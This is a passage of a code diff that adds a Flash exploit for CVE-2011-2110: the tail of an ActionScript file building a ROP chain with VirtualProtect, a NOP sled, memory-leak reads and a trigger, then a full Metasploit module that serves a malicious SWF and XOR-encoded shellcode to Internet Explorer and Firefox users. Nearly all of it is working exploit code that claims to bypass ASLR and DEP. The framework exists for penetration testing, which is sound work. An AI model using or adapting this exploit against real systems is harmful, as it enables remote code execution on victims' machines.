+			this.code.writeUnsignedInt(this.dec_eax_ret);
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt(this.dec_eax_ret);
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt(this.dec_eax_ret);
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt(this.dec_eax_ret);
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt(this.dec_eax_ret);
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt(this.dec_eax_ret);
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt(this.dec_eax_ret);
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt(this.dec_eax_ret);
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt(this.dec_eax_ret);
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt(this.dec_eax_ret);
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt(this.to_eax);
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt(this.virtualprotect);
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt((this.pobj - 1) + 16 + 1024 * 4 * 100 + 292);
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt((this.pobj - 1) + 16 + 1024 * 4 * 100 + 292);
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt(131072);
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt(64);
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt((this.pobj - 1) + 4);
+			this.code.endian = Endian.BIG_ENDIAN;
+			
+			// previous pe loader stub removed, just to be safe
+			this.code.writeUnsignedInt(0x90909090);
+			this.code.writeUnsignedInt(0x90909090);
+			this.code.writeUnsignedInt(0x90909090);
+			this.code.writeUnsignedInt(0x90909090);
+			this.code.writeUnsignedInt(0x90909090);
+			this.code.writeUnsignedInt(0x90909090);
+			this.code.writeUnsignedInt(0x90909090);
+			this.code.writeUnsignedInt(0x90909090);
+			this.code.writeUnsignedInt(0x90909090);
+			this.code.writeUnsignedInt(0x90909090);
+			this.code.writeUnsignedInt(0x90909090);
+			this.code.writeUnsignedInt(0x90909090);
+			this.code.writeUnsignedInt(0x90909090);
+			this.code.writeUnsignedInt(0x90909090);
+			this.code.writeUnsignedInt(0x90909090);
+			this.code.writeUnsignedInt(0x90909090);
+			
+			// shellcode
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.writeBytes(this.content, 0, this.content.length);
+
+			// Second leak
+			var _loc_5:Number = new Number(parseFloat(String(args[0x3FFFFFAD])));
+
+			var _loc_6:* = new ByteArray();
+			_loc_6.position = 0;
+			_loc_6.writeDouble(_loc_5);
+			var _loc_7:* = _loc_6[0] * 16777216 + _loc_6[1] * 65536 + _loc_6[2] * 256 + _loc_6[3];
+			this.pobj = _loc_7;
+
+			_loc_8 = 0;
+			this.pobj = this.pobj + 0x37;
+
+			// with this loop, we store a reference for the leaked address in the stack
+			_loc_8 = 0;
+			while (_loc_8 < 100)
+			{
+				this.code.writeInt(this.pobj);
+				_loc_8 = _loc_8 + 1;
+			}
+
+			// third leak
+			var _loc_9:Number = new Number(parseFloat(String(args[0x3FFFFFB9])));
+			var _leak_3:* = new ByteArray();
+			_leak_3.position = 0;
+			_leak_3.writeDouble(_loc_9);
+			_loc_4 = _leak_3[0] * 16777216 + _leak_3[1] * 65536 + _leak_3[2] * 256 + _leak_3[3];
+			this.pobj = _loc_4 + 2;
+
+			// dont remove, the stack will change
+			ExternalInterface.call("", ""); 
+
+			// again, a reference to the leaked address is stored in the stack
+			_loc_8 = 0;
+			while (_loc_8 < 100)
+			{
+				this.code.writeInt(this.pobj);
+				_loc_8 = _loc_8 + 1;
+			}
+
+			this.code.position = 0;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeInt((this.pobj - 1) + 16 + 1024 * 4 * 100);
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.position = 409872;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt((this.pobj - 1) + 16 + 1024 * 4 * 100 + 292);
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt((this.pobj - 1) + 16 + 1024 * 4 * 100 + 292);
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt(131072);
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt(64);
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt((this.pobj - 1) + 4);
+			this.code.endian = Endian.BIG_ENDIAN;
+			
+			// This is the trigger.
+			Number(args[0x3FFFFFB9]);
+			return;
+		}
+	}
+}
diff --git a/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb b/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb
new file mode 100644
index 0000000000..bc3632e370
--- /dev/null
+++ b/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb
@@ -0,0 +1,178 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = GreatRanking
+
+	include Msf::Exploit::Remote::HttpServer::HTML
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Adobe Flash Player AVM Verification Logic Array Indexing Code Execution',
+			'Description'    => %q{
+					This module exploits a vulnerability in Adobe Flash Player versions 10.3.181.23
+				and earlier. This issue is caused by a failure in the ActionScript3 AVM2 verification
+				logic. This results in unsafe JIT(Just-In-Time) code being executed. This is the same
+				vulnerability that was used for attacks against Korean based organisations.
+
+					Specifically, this issue occurs when indexing an array using an arbitrary value,
+				memory can be referenced and later executed. Taking advantage of this issue does not rely
+				on heap spraying as the vulnerability can also be used for information leakage.
+
+					Currently this exploit works for IE6, IE7, IE8, Firefox 10.2 and likely several
+				other browsers under multiple Windows platforms. This exploit bypasses ASLR/DEP and
+				is very reliable.
+				},
+			'License'        => MSF_LICENSE,
+			'Author'         =>
+				[
+					'mr_me <steventhomasseeley[at]gmail.com>', # msf exploit,
+					'Unknown'                                  # malware version seen used in targeted attacks
+				],
+			'Version'        => '$Revision$',
+			'References'     =>
+				[
+					['CVE', '2011-2110'],
+					['OSVDB', '48268'],
+					['URL', 'http://www.adobe.com/devnet/swf.html'],
+					['URL', 'http://www.adobe.com/support/security/bulletins/apsb11-18.html'],
+					['URL', 'http://www.accessroot.com/arteam/site/download.php?view.331'],
+					['URL', 'http://www.shadowserver.org/wiki/pmwiki.php/Calendar/20110617'],
+				],
+			'DefaultOptions' =>
+				{
+					'EXITFUNC'             => 'process',
+					'HTTP::compression'    => 'gzip',
+					'HTTP::chunked'        => true,
+					'InitialAutoRunScript' => 'migrate -f'
+				},
+			'Payload'        =>
+				{
+					'Space'       => 2000,
+					'BadChars'    => "\x00",
+					'DisableNops' => true
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[ 'Automatic', {}],
+				],
+			'DisclosureDate' => 'Jun 21 2012',
+			'DefaultTarget'  => 0))
+	end
+
+	def exploit
+		# src for the flash file: external/source/exploits/CVE-2011-2110/CVE-2011-2110.as
+		# full aslr/dep bypass using the info leak as per malware
+		path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2011-2110.swf" )
+		fd = File.open( path, "rb" )
+		@swf = fd.read(fd.stat.size)
+		fd.close
+		super
+	end
+
+	def check_dependencies
+		use_zlib
+	end
+
+	def get_target(agent)
+		#If the user is already specified by the user, we'll just use that
+		return target if target.name != 'Automatic'
+
+		if agent =~ /MSIE/
+			return targets[0]  # ie 6/7/8 tested working
+		elsif agent =~ /Firefox/
+			return targets[0]  # ff 10.2 tested working
+		else
+			return nil
+		end
+	end
+
+	def on_request_uri(cli, request)
+		agent = request.headers['User-Agent']
+		my_target = get_target(agent)
+
+		# Avoid the attack if the victim doesn't have the same setup we're targeting
+		if my_target.nil?
+			print_error("#{cli.peerhost}:#{cli.peerport} - Browser not supported: #{agent.to_s}")
+			send_not_found(cli)
+			return
+		end
+
+		xor_byte  = 122
+		trigger   = @swf
+		trigger_file = rand_text_alpha(rand(6)+3) + ".swf"
+		code = rand_text_alpha(rand(6)+3) + ".txt"
+
+		sc = Zlib::Deflate.deflate(payload.encoded)
+		shellcode = ""
+
+		sc.each_byte do | c |
+			shellcode << (xor_byte ^ c)
+		end
+
+		uri  = ((datastore['SSL']) ? "https://" : "http://")
+		uri << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST'])
+		uri << ":#{datastore['SRVPORT']}#{get_resource()}/#{code}"
+
+		bd_uri = Zlib::Deflate.deflate(uri)
+
+		uri = ""
+		bd_uri.each_byte do | c |
+			uri << (xor_byte ^ c)
+		end
+
+		bd_uri = uri.unpack("H*")[0]
+
+		obj_id = rand_text_alpha(rand(6)+3)
+
+		if request.uri.match(/\.swf/i)
+			print_status("Sending malicious swf")
+			send_response(cli, trigger, { 'Content-Type' => 'application/x-shockwave-flash' })
+			return
+		end
+
+		if request.uri.match(/\.txt/i)
+			print_status("Sending payload")
+			send_response(cli, shellcode, { 'Content-Type' => 'text/plain' })
+			return
+		end
+
+		html =  <<-EOS
+		<html>
+		<head>
+		</head>
+		<body>
+		<center>
+		<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
+		id="#{obj_id}" width="600" height="400"
+		codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">
+		<param name="movie" value="/test/#{trigger_file}?info=#{bd_uri}" />
+		<embed src="/test/#{trigger_file}?info=#{bd_uri}" quality="high"
+		width="320" height="300" name="#{obj_id}" align="middle"
+		allowNetworking="all"
+		type="application/x-shockwave-flash"
+		pluginspage="http://www.macromedia.com/go/getflashplayer">
+		</embed>
+		</object>
+		</center>
+		</body>
+		</html>
+		EOS
+
+		html = html.gsub(/^\t\t/, '')
+
+		print_status("Sending #{self.name} HTML")
+		send_response(cli, html, { 'Content-Type' => 'text/html' })
+	end
+end